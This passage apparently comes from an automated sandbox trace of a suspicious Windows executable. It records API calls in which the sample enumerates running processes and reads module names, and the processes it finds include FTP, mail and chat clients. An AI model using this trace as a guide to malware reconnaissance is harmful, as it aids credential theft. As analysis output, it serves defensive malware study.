SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0111.234] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0x49c1868 [0111.234] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8ec) returned 0x74ea290 [0111.234] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x74eab88 [0111.234] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x74eab88, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe")) returned 0x3a [0111.234] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0111.234] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x74eb390 [0111.234] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" --Admin IsNotAutoStart IsNotTask" [0111.234] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d8d0 | out: pNumArgs=0x18d8d0) returned 0x74a54b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0111.234] lstrcpyW (in: lpString1=0x18e560, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0111.235] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0111.235] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0111.235] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" --Admin IsNotAutoStart IsNotTask" [0111.235] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d86c | out: pNumArgs=0x18d86c) returned 0x74a54b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0111.235] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe") returned="OqRoSnESYXcDITEx.exe" [0111.235] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0111.236] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0111.236] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0111.237] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0111.237] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0111.238] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0111.239] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0111.239] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0111.239] EnumProcesses (in: lpidProcess=0x183068, cb=0xa000, lpcbNeeded=0x18d878 | out: lpidProcess=0x183068, lpcbNeeded=0x18d878) returned 1 [0111.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0111.246] CloseHandle (hObject=0x0) returned 0 [0111.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0111.246] CloseHandle (hObject=0x0) returned 0 [0111.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0111.246] CloseHandle (hObject=0x0) returned 0 [0111.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0111.246] CloseHandle (hObject=0x0) returned 0 [0111.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0111.246] CloseHandle (hObject=0x0) returned 0 [0111.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0111.247] CloseHandle (hObject=0x0) returned 0 [0111.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0111.247] CloseHandle (hObject=0x0) returned 0 [0111.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0111.247] CloseHandle (hObject=0x0) returned 0 [0111.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0111.247] CloseHandle (hObject=0x0) returned 0 [0111.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0111.247] CloseHandle (hObject=0x0) returned 0 [0111.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0111.247] CloseHandle (hObject=0x0) returned 0 [0111.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0111.247] CloseHandle (hObject=0x0) returned 0 [0111.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0111.248] CloseHandle (hObject=0x0) returned 0 [0111.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0111.248] CloseHandle (hObject=0x0) returned 0 [0111.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0111.248] CloseHandle (hObject=0x0) returned 0 [0111.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0111.248] CloseHandle (hObject=0x0) returned 0 [0111.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0111.248] CloseHandle (hObject=0x0) returned 0 [0111.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0111.248] CloseHandle (hObject=0x0) returned 0 [0111.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a0 [0111.248] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0111.249] CloseHandle (hObject=0x5a0) returned 1 [0111.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5a0 [0111.249] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0111.249] CloseHandle (hObject=0x5a0) returned 1 [0111.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0111.249] CloseHandle (hObject=0x0) returned 0 [0111.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0111.249] CloseHandle (hObject=0x0) returned 0 [0111.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a0 [0111.250] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0111.250] CloseHandle (hObject=0x5a0) returned 1 [0111.250] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5a0 [0111.250] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0111.250] CloseHandle (hObject=0x5a0) returned 1 [0111.250] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x5a0 [0111.250] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.252] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xc40000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="herb cos completed.exe") returned 0x16 [0111.252] CloseHandle (hObject=0x5a0) returned 1 [0111.252] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x5a0 [0111.252] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.253] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1210000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="dealers.exe") returned 0xb [0111.254] CloseHandle (hObject=0x5a0) returned 1 [0111.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5a0 [0111.254] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.255] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1350000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="hall-stronger.exe") returned 0x11 [0111.256] CloseHandle (hObject=0x5a0) returned 1 [0111.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5a0 [0111.256] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.257] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1380000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="rp-hip.exe") returned 0xa [0111.258] CloseHandle (hObject=0x5a0) returned 1 [0111.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x564) returned 0x5a0 [0111.258] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.259] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x340000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="karma_coat.exe") returned 0xe [0111.259] CloseHandle (hObject=0x5a0) returned 1 [0111.260] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x560) returned 0x5a0 [0111.260] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.261] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1070000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="plenty_leather.exe") returned 0x12 [0111.261] CloseHandle (hObject=0x5a0) returned 1 [0111.261] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x5a0 [0111.261] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.263] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1180000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="entrytrackbackspatent.exe") returned 0x19 [0111.263] CloseHandle (hObject=0x5a0) returned 1 [0111.263] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a8) returned 0x5a0 [0111.263] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.266] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xee0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="busy.exe") returned 0x8 [0111.266] CloseHandle (hObject=0x5a0) returned 1 [0111.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x114) returned 0x5a0 [0111.266] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.268] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd70000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="sudan_territory.exe") returned 0x13 [0111.268] CloseHandle (hObject=0x5a0) returned 1 [0111.268] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x5a0 [0111.268] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.269] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x360000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="catalogs intelligent.exe") returned 0x18 [0111.270] CloseHandle (hObject=0x5a0) returned 1 [0111.270] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x5a0 [0111.270] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.271] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x830000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="prisonermounted.exe") returned 0x13 [0111.272] CloseHandle (hObject=0x5a0) returned 1 [0111.272] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5a0 [0111.272] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.273] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1220000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="extensive.exe") returned 0xd [0111.274] CloseHandle (hObject=0x5a0) returned 1 [0111.274] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5a0 [0111.274] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.275] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xde0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="posters-baker-lift.exe") returned 0x16 [0111.275] CloseHandle (hObject=0x5a0) returned 1 [0111.275] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x5a0 [0111.276] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.277] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xc80000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="emperor_respected.exe") returned 0x15 [0111.277] CloseHandle (hObject=0x5a0) returned 1 [0111.277] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x40c) returned 0x5a0 [0111.277] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.279] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x11f0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="illinois indicated regional.exe") returned 0x1f [0111.279] CloseHandle (hObject=0x5a0) returned 1 [0111.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c8) returned 0x5a0 [0111.279] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.281] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x2f0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="apartmentscontemporary.exe") returned 0x1a [0111.282] CloseHandle (hObject=0x5a0) returned 1 [0111.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x5a0 [0111.282] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.283] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xce0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="witch-feat.exe") returned 0xe [0111.284] CloseHandle (hObject=0x5a0) returned 1 [0111.284] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5ac) returned 0x5a0 [0111.284] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.285] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x930000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0111.285] CloseHandle (hObject=0x5a0) returned 1 [0111.285] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x5a0 [0111.285] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.287] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x20000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0111.287] CloseHandle (hObject=0x5a0) returned 1 [0111.287] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x24c) returned 0x5a0 [0111.287] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.289] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1d0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0111.289] CloseHandle (hObject=0x5a0) returned 1 [0111.289] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6dc) returned 0x5a0 [0111.289] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.290] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x280000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0111.291] CloseHandle (hObject=0x5a0) returned 1 [0111.291] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x5a0 [0111.291] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.292] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1060000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0111.293] CloseHandle (hObject=0x5a0) returned 1 [0111.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x620) returned 0x5a0 [0111.293] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.294] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1100000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0111.294] CloseHandle (hObject=0x5a0) returned 1 [0111.294] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5a0 [0111.295] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.296] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xf10000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0111.296] CloseHandle (hObject=0x5a0) returned 1 [0111.296] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5a0 [0111.296] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.298] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1270000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0111.298] CloseHandle (hObject=0x5a0) returned 1 [0111.298] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x55c) returned 0x5a0 [0111.298] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.299] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x12c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0111.300] CloseHandle (hObject=0x5a0) returned 1 [0111.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b0) returned 0x5a0 [0111.300] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.301] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x340000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0111.302] CloseHandle (hObject=0x5a0) returned 1 [0111.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x208) returned 0x5a0 [0111.302] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.303] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x130000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0111.303] CloseHandle (hObject=0x5a0) returned 1 [0111.304] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x484) returned 0x5a0 [0111.304] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.305] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xe90000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0111.305] CloseHandle (hObject=0x5a0) returned 1 [0111.305] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ec) returned 0x5a0 [0111.305] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.307] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1e0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0111.307] CloseHandle (hObject=0x5a0) returned 1 [0111.307] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x5a0 [0111.307] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.309] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x20000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0111.309] CloseHandle (hObject=0x5a0) returned 1 [0111.309] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x5a0 [0111.309] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.310] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1280000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0111.311] CloseHandle (hObject=0x5a0) returned 1 [0111.311] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x5a0 [0111.311] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.312] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x50000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0111.313] CloseHandle (hObject=0x5a0) returned 1 [0111.313] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5a0 [0111.313] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.314] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa30000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0111.314] CloseHandle (hObject=0x5a0) returned 1 [0111.314] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x5a0 [0111.315] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.316] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xbe0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0111.316] CloseHandle (hObject=0x5a0) returned 1 [0111.316] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x5a0 [0111.316] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.318] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xcc0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0111.318] CloseHandle (hObject=0x5a0) returned 1 [0111.318] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x5a0 [0111.318] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.319] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x10c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0111.320] CloseHandle (hObject=0x5a0) returned 1 [0111.320] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x5a0 [0111.320] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.321] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x80000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0111.321] CloseHandle (hObject=0x5a0) returned 1 [0111.321] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x5a0 [0111.322] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.323] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x13d0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0111.323] CloseHandle (hObject=0x5a0) returned 1 [0111.323] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x5a0 [0111.323] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.325] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xf90000, 